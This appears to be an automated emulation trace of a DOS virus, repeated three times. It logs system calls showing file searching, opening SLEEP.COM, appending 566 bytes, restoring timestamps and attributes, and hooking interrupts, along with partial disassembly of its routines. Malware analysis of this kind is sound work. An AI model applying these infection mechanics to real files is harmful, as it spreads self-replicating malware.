2018-12-25T11:43:13.968013095Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:13.970136694Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.976730216Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:13.984535302Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:13.986955573Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.996267012Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:14.005012509Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:14.010087298Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:14.011035755Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:14.012815465Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:14.019296542Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:14.020562748Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:14.027096979Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:14.033828348Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:14.036228058Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:14.042522622Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:14.04972824Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:14.051386788Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:14.053656165Z	59	PC: 12a99 \| Change current directory
2018-12-25T11:43:14.058560211Z	42	PC: 12b79 \| Get date 0x12b79: cmp cx, 0x7d0 0x12b7d: jb 0x12b87 0x12b7f: mov ah, 9 0x12b81: lea dx, word ptr [bp + 0x291] 0x12b85: int 0x21 0x12b87: ret 0x12b88: mov ah, 0x42 0x12b8a: xor cx, cx 0x12b8c: xor dx, dx 0x12b8e: int 0x21 0x12b90: ret 0x12b91: mov ah, 0x1a 0x12b93: int 0x21 0x12b95: ret 0x12b96: mov ah, 0x3d 0x12b98: lea dx, word ptr [bp + 0x3b5] 0x12b9c: int 0x21 0x12b9e: xchg ax, bx 0x12b9f: ret 0x12ba0: mov ax, 0x4301
2018-12-25T11:43:14.060836864Z	37	PC: 12aa8 \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:43:14.061890118Z	59	PC: 12ab2 \| Change current directory
2018-12-25T11:43:14.064328203Z	26	PC: 12b95 \| Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":1266,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:43:13.048503605Z	61	PC: 12a4e \| Open file (Filename = 'is started by using +the SHELL command in the CONFIG.SYS file. F##¸#ã#,$z$À$%U% %à%,&y&')
2018-12-25T11:43:13.057755981Z	26	PC: 12b95 \| Set disk transfer address
2018-12-25T11:43:13.0588527Z	53	PC: 12a6c \| Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:43:13.059909099Z	37	PC: 12a7e \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:43:13.06177235Z	71	PC: 12a8a \| Get current directory
2018-12-25T11:43:13.06467553Z	78	PC: 12ac0 \| Find first file
2018-12-25T11:43:13.070509844Z	61	PC: 12b9e \| Open file (Filename = 'SLEEP.COM')
2018-12-25T11:43:13.077514776Z	63	PC: 12af1 \| Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:43:13.084389605Z	62	PC: 12af5 \| Close file
2018-12-25T11:43:13.086049291Z	67	PC: 12ba9 \| Get or set file attributes
2018-12-25T11:43:13.374594227Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.381542486Z	64	PC: 12b3f \| Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:43:13.388237666Z	66	PC: 12b90 \| Move file pointer
2018-12-25T11:43:13.390086892Z	44	PC: 12b4a \| Get time 0x12b4a: cmp dh, 0 0x12b4d: je 0x12b46 0x12b4f: mov byte ptr cs:[bp + 0x33a], dh 0x12b54: call 0x12c36 0x12b57: mov ax, 0x5701 0x12b5a: mov cx, word ptr cs:[bp + 0x3ad] 0x12b5f: mov dx, word ptr cs:[bp + 0x3af] 0x12b64: int 0x21 0x12b66: mov ah, 0x3e 0x12b68: int 0x21 0x12b6a: xor cx, cx 0x12b6c: mov cl, byte ptr cs:[bp + 0x3ac] 0x12b71: call 0x12ba0 0x12b74: ret 0x12b75: mov ah, 0x2a 0x12b77: int 0x21 0x12b79: cmp cx, 0x7d0 0x12b7d: jb 0x12b87 0x12b7f: mov ah, 9 0x12b81: lea dx, word ptr [bp + 0x291]
2018-12-25T11:43:13.393206954Z	64	PC: 12c8e \| Write file or device (Write 566 bytes on handle 5)
2018-12-25T11:43:13.40151408Z	87	PC: 12b66 \| Get or set file date and time
2018-12-25T11:43:13.402999724Z	62	PC: 12b6a \| Close file
2018-12-25T11:43:13.411004207Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.70095622Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:13.704050881Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.711668139Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:13.718382634Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:13.720255227Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.729099281Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.733556856Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:13.735579281Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:13.746771196Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:13.74995678Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:13.771805442Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:13.774709378Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:13.783756879Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.795328621Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:13.799642661Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.806676481Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:13.813377873Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:13.816105559Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.842930653Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.849728254Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:13.853417947Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:13.871362937Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:13.874179812Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:13.884272122Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:13.885788131Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:13.898717257Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.90723364Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:13.90919167Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.913300705Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:13.91779377Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:13.919806901Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.926055375Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.933345765Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:13.935832347Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:13.936987923Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:13.938738038Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:13.945210318Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:13.946557276Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:13.951974486Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.962549592Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:13.965394879Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.972200216Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:13.979306148Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:13.981179576Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.986563245Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.99039544Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:13.993249725Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:13.994673878Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:13.997574501Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:14.012229321Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:14.013750761Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:14.015646528Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:14.020058226Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:14.02285518Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:14.029578029Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:14.048660751Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:14.051203249Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:14.061521705Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:14.068081201Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:14.071261809Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:14.074211411Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:14.07699546Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:14.09065299Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:14.09347071Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:14.101155658Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:14.111567961Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:14.116799837Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:14.124335262Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:14.130933238Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:14.145440584Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:14.155249273Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:14.16168766Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:14.164705413Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:14.166053854Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:14.168527744Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:14.178386259Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:14.180855148Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:14.189646383Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:14.200765001Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:14.20384343Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:14.210897771Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:14.218004473Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:14.220317343Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:14.223028074Z	59	PC: 12a99 \| Change current directory
2018-12-25T11:43:14.228470123Z	42	PC: 12b79 \| Get date 0x12b79: cmp cx, 0x7d0 0x12b7d: jb 0x12b87 0x12b7f: mov ah, 9 0x12b81: lea dx, word ptr [bp + 0x291] 0x12b85: int 0x21 0x12b87: ret 0x12b88: mov ah, 0x42 0x12b8a: xor cx, cx 0x12b8c: xor dx, dx 0x12b8e: int 0x21 0x12b90: ret 0x12b91: mov ah, 0x1a 0x12b93: int 0x21 0x12b95: ret 0x12b96: mov ah, 0x3d 0x12b98: lea dx, word ptr [bp + 0x3b5] 0x12b9c: int 0x21 0x12b9e: xchg ax, bx 0x12b9f: ret 0x12ba0: mov ax, 0x4301
2018-12-25T11:43:14.231300498Z	37	PC: 12aa8 \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:43:14.232764281Z	59	PC: 12ab2 \| Change current directory
2018-12-25T11:43:14.234975171Z	26	PC: 12b95 \| Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":1266,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:43:13.784488544Z	61	PC: 12a4e \| Open file (Filename = 'is started by using +the SHELL command in the CONFIG.SYS file. F##¸#ã#,$z$À$%U% %à%,&y&')
2018-12-25T11:43:13.78983295Z	26	PC: 12b95 \| Set disk transfer address
2018-12-25T11:43:13.791681959Z	53	PC: 12a6c \| Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:43:13.793328235Z	37	PC: 12a7e \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:43:13.795429396Z	71	PC: 12a8a \| Get current directory
2018-12-25T11:43:13.798851832Z	78	PC: 12ac0 \| Find first file
2018-12-25T11:43:13.811589078Z	61	PC: 12b9e \| Open file (Filename = 'SLEEP.COM')
2018-12-25T11:43:13.820517548Z	63	PC: 12af1 \| Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:43:13.827495081Z	62	PC: 12af5 \| Close file
2018-12-25T11:43:13.829706708Z	67	PC: 12ba9 \| Get or set file attributes
2018-12-25T11:43:13.846646708Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.854075603Z	64	PC: 12b3f \| Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:43:13.857226792Z	66	PC: 12b90 \| Move file pointer
2018-12-25T11:43:13.859817674Z	44	PC: 12b4a \| Get time 0x12b4a: cmp dh, 0 0x12b4d: je 0x12b46 0x12b4f: mov byte ptr cs:[bp + 0x33a], dh 0x12b54: call 0x12c36 0x12b57: mov ax, 0x5701 0x12b5a: mov cx, word ptr cs:[bp + 0x3ad] 0x12b5f: mov dx, word ptr cs:[bp + 0x3af] 0x12b64: int 0x21 0x12b66: mov ah, 0x3e 0x12b68: int 0x21 0x12b6a: xor cx, cx 0x12b6c: mov cl, byte ptr cs:[bp + 0x3ac] 0x12b71: call 0x12ba0 0x12b74: ret 0x12b75: mov ah, 0x2a 0x12b77: int 0x21 0x12b79: cmp cx, 0x7d0 0x12b7d: jb 0x12b87 0x12b7f: mov ah, 9 0x12b81: lea dx, word ptr [bp + 0x291]
2018-12-25T11:43:13.862959954Z	64	PC: 12c8e \| Write file or device (Write 566 bytes on handle 5)
2018-12-25T11:43:13.871674531Z	87	PC: 12b66 \| Get or set file date and time
2018-12-25T11:43:13.873522237Z	62	PC: 12b6a \| Close file
2018-12-25T11:43:13.881761146Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.892164316Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:13.89482639Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.902059516Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:13.908265064Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:13.909979127Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.923652294Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.930346161Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:13.933251448Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:13.935230268Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:13.937686274Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:13.945949541Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:13.948104843Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:13.955923111Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.965550061Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:13.969139697Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.975447149Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:13.981790511Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:13.985229968Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.995042555Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:14.001681705Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:14.004982675Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:14.006405107Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:14.008074878Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:14.017099754Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:14.018847896Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:14.027697745Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:14.039433577Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:14.042345083Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:14.049088242Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:14.055558876Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:14.057545271Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:14.067397129Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:14.074018682Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:14.077304056Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:14.078919202Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:14.081592627Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:14.090475112Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:14.092122584Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:14.099590573Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:14.110445191Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:14.113352844Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:14.119974563Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:14.127391713Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:14.129867934Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:14.133999549Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:14.139215215Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:14.143195714Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:14.144637256Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:14.147650147Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:14.163197047Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:14.164736337Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:14.167105347Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:14.171438485Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:14.1742759Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:14.18255894Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:14.189720303Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:14.191760538Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:14.202425544Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:14.208922014Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:14.211969296Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:14.214322586Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:14.217355014Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:14.226599469Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:14.229130796Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:14.237252282Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:14.247056909Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:14.250320488Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:14.257370364Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:14.26408964Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:14.26629924Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:14.277449836Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:14.289500825Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:14.296252274Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:14.298568075Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:14.301075652Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:14.309490444Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:14.311928491Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:14.319021555Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:14.326877239Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:14.33037648Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:14.335386494Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:14.339562461Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:14.341670281Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:14.344090385Z	59	PC: 12a99 \| Change current directory
2018-12-25T11:43:14.34810045Z	42	PC: 12b79 \| Get date 0x12b79: cmp cx, 0x7d0 0x12b7d: jb 0x12b87 0x12b7f: mov ah, 9 0x12b81: lea dx, word ptr [bp + 0x291] 0x12b85: int 0x21 0x12b87: ret 0x12b88: mov ah, 0x42 0x12b8a: xor cx, cx 0x12b8c: xor dx, dx 0x12b8e: int 0x21 0x12b90: ret 0x12b91: mov ah, 0x1a 0x12b93: int 0x21 0x12b95: ret 0x12b96: mov ah, 0x3d 0x12b98: lea dx, word ptr [bp + 0x3b5] 0x12b9c: int 0x21 0x12b9e: xchg ax, bx 0x12b9f: ret 0x12ba0: mov ax, 0x4301
2018-12-25T11:43:14.350629665Z	37	PC: 12aa8 \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:43:14.351660685Z	59	PC: 12ab2 \| Change current directory
2018-12-25T11:43:14.353233778Z	26	PC: 12b95 \| Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":1266,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:43:14.131753318Z	61	PC: 12a4e \| Open file (Filename = 'is started by using +the SHELL command in the CONFIG.SYS file. F##¸#ã#,$z$À$%U% %à%,&y&')
2018-12-25T11:43:14.138380716Z	26	PC: 12b95 \| Set disk transfer address
2018-12-25T11:43:14.139722566Z	53	PC: 12a6c \| Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:43:14.141032611Z	37	PC: 12a7e \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:43:14.142823322Z	71	PC: 12a8a \| Get current directory
2018-12-25T11:43:14.145540207Z	78	PC: 12ac0 \| Find first file
2018-12-25T11:43:14.153684191Z	61	PC: 12b9e \| Open file (Filename = 'SLEEP.COM')
2018-12-25T11:43:14.160485383Z	63	PC: 12af1 \| Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:43:14.167602053Z	62	PC: 12af5 \| Close file
2018-12-25T11:43:14.169733455Z	67	PC: 12ba9 \| Get or set file attributes
2018-12-25T11:43:14.189540043Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:14.201487778Z	64	PC: 12b3f \| Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:43:14.208141763Z	66	PC: 12b90 \| Move file pointer
2018-12-25T11:43:14.20978051Z	44	PC: 12b4a \| Get time 0x12b4a: cmp dh, 0 0x12b4d: je 0x12b46 0x12b4f: mov byte ptr cs:[bp + 0x33a], dh 0x12b54: call 0x12c36 0x12b57: mov ax, 0x5701 0x12b5a: mov cx, word ptr cs:[bp + 0x3ad] 0x12b5f: mov dx, word ptr cs:[bp + 0x3af] 0x12b64: int 0x21 0x12b66: mov ah, 0x3e 0x12b68: int 0x21 0x12b6a: xor cx, cx 0x12b6c: mov cl, byte ptr cs:[bp + 0x3ac] 0x12b71: call 0x12ba0 0x12b74: ret 0x12b75: mov ah, 0x2a 0x12b77: int 0x21 0x12b79: cmp cx, 0x7d0 0x12b7d: jb 0x12b87 0x12b7f: mov ah, 9 0x12b81: lea dx, word ptr [bp + 0x291]
2018-12-25T11:43:14.212755011Z	64	PC: 12c8e \| Write file or device (Write 566 bytes on handle 5)
2018-12-25T11:43:14.221428361Z	87	PC: 12b66 \| Get or set file date and time
2018-12-25T11:43:14.223251103Z	62	PC: 12b6a \| Close file
2018-12-25T11:43:14.232692843Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:14.24267854Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:14.246198797Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:14.255307704Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:14.261865322Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:14.264042749Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:14.275620283Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:14.282483898Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:14.285116401Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:14.287681901Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:14.290026198Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:14.295746084Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:14.297870538Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:14.303214288Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:14.311674099Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:14.323791875Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:14.328498216Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:14.334130558Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:14.337571579Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:14.348343546Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:14.353405855Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:14.358450869Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:14.360639676Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:14.363556075Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:14.372772938Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:14.374191512Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:14.382146453Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:14.392776636Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:14.395379741Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:14.402011329Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:14.409066044Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:14.411326934Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:14.421490459Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:14.428145511Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:14.431660019Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:14.433263561Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:14.435927034Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:14.445135663Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:14.44677956Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:14.454241703Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:14.465615784Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:14.468439406Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:14.475602761Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:14.483015595Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:14.484997642Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:14.489461904Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:14.494445914Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:14.49701234Z	66	PC: 12b90 \| Move file pointer (See above)
